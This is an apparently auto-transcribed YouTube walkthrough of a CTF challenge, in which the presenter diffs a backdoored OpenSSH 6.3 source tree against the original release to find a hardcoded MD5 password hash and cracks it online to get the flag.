 What's going on everybody? My name is John Hammond. Welcome back to the YouTube video still looking at the all army cyber stakes or ACI CTF So this challenge I want to showcase is called. Can you look this over? It's 450 points in the Michelinia's category The time recording it has 172 solves. It's Saturday and the game should end Sunday night So we'll see how many more that gets it says our ops guy found a malware author staging server We managed to exfiltrate the source to a back door. They're spreading they give us a download here So I'll grab that link location. I need you to report back once you've cracked their secret password Okay, so let's fire up a terminal. I'll hop on over to a directory here, and I'll make a directory for this Can you look this over? See the end of that guy and let's W get that file down There we go looks like a G zip file So I'll go ahead and gun zip it and it's still a tar so let's tar X ZVF all on that guy And there we go now we have a backdoor directory with a lot of files in here see me a lot of references to SSH I care about What this software really is? Seemly it's SSH right or open SSH. I want to determine what it actually might be version wise So I see this version header file. So let's cat that out just to take a look. Okay. It looks like it's open BSD That might just for be for BSD itself define SSH version open SSH 6.3. Okay so if this is a modified and manipulated version of Open SSH version 6.3, then I want to be able to take the differences between it and the original open SSH 6.3, so I'll try and go scour the internet For a download for open SSH version 6.3. Maybe I could download this somewhere Looks like a lot of vulnerability references. I want to download so if I search for download does that work for me? Linux from scratch offers it slack where seems to have some references This is just the release page on The open SSH website. Can I download it from them? Will they give me? There for open BSD ftp 8.2. Can I get 6.3? maybe oh well theirs isn't portable and The version number on this one is SSH portable. Maybe some of the others might have that Oh, yeah open SSH 6.3 slack where or the beyond Linux from scratch one has a download So let's get that one and that has the P1 that they reference here as well. So maybe that is good Let's W get that guy down Takes a little bit of time to download but he's cruising through it Okay, so now let's go ahead and gunzip that open SSH guy and tar to extract him one more time That should be an X not a Z There we go. Okay, so now we have open SSH 6.3. Let's cut out that version number to make sure it's the same looks to be Okay, fantastic. So what I'm gonna do is I'm actually gonna I want to be able to like compare all of these files at the exact same time It might be kind of dirty it might be kind of messy, but it might still at least work for me So if I grep tack R of everything it will return literally all the output of all the files that it can get I don't have to do this inside of the current directory So it doesn't include that parent name in that file path that's displayed over on the left here So if I grep all these and I put these in like a parent directory original dot text so Move up now. I have that original dot text for all of the files in the Original source code I can do the exact same thing in the back door if I grep tack R Everything and put that in like theirs dot text or what they kind of offer me now I have both the original and The back door all their files and I could compare them kind of easily because grep will allow me to do that since it's all source code Right, so I could potentially just diff the original and theirs. I might be able to see some Particularly interesting stuff. I also immediately see a little auth password and it says there's a static character hash the back door hash This guy here. So that looks like hex I could just steal this and work with it, but I did want to show you another trick and tool I really really like meld. It's a gooey diff viewer So if I were to make a file comparison, I could be able to go specify that can you look this over the original on the left and There's on the right once I start to compare all of this Meld will show me everything that's in both files So I would still be able to see okay These lines match on both the left-hand side for the original and the right-hand side for theirs Eventually it should start to find some differences You can see it's still chewing up there and it's taken a little bit more time to work through it all But I'll let this go and we'll start to go look at that hash But I want to show you where you could potentially see it with that tool as well Let's grab this hash. I'm gonna open it up and just a blind text to make a little hash dot text I'll drag this down so you can see it there we go And let's go remove all those zero x's. Let's remove all of the comma So let's go ahead and grab this hash and I'll try and crack it online I'll use a little crack station just because that's kind of the quick and easy one If I spit that in there. Yep. I'm not a robot crack hashes It could not find it So when I kind of went back to the drawing board and I was looking at the diff here I know that well, okay, this is an md5 theoretically right md5 digest length We can assume they're using some md5 algorithm stuff. This has to be md5 So I try a little bit more googling. I did crack md5 hash online And eventually I found this little cmd5 guy and that one seemed to work for me So if I slap that into This it will decrypt it and that is my hash It is bb me zero y yours might be different I think they know they were doing some of the randomly generated stuff So if we were to go ahead and paste that in this can you look this over challenge? That is the whole flag that you need. It doesn't need the like aci Curly braces and the regular flag format. So that was that that was that challenge Just being able to simply kind of take a look at the differences here Using all the files all at once I tend to like that technique because I could really see Okay, this is all of the output from either side In any every single file because there wasn't going to be a ton And I mean if there were going to be a ton then I could look through it with meld Which was awesome But the auth.c and auth.pass would be pretty easy to detect once we had the right open ssh version number. So okay Hey, thank you guys so much for watching if you did I started if you guys did like this video Please do press that like button if you'd like to leave a comment That'd be fantastic if you'd like to subscribe do all those youtube algorithm things. I would be super duper grateful Thank you so much for your support. If you would like to support in some other ways PayPal patreon link in description. I'm super duper grateful. Thank you. Thank you. Thank you Love you guys on patreon discord linkedin facebook twitter all of the social media things I'll see you in the next video. Take care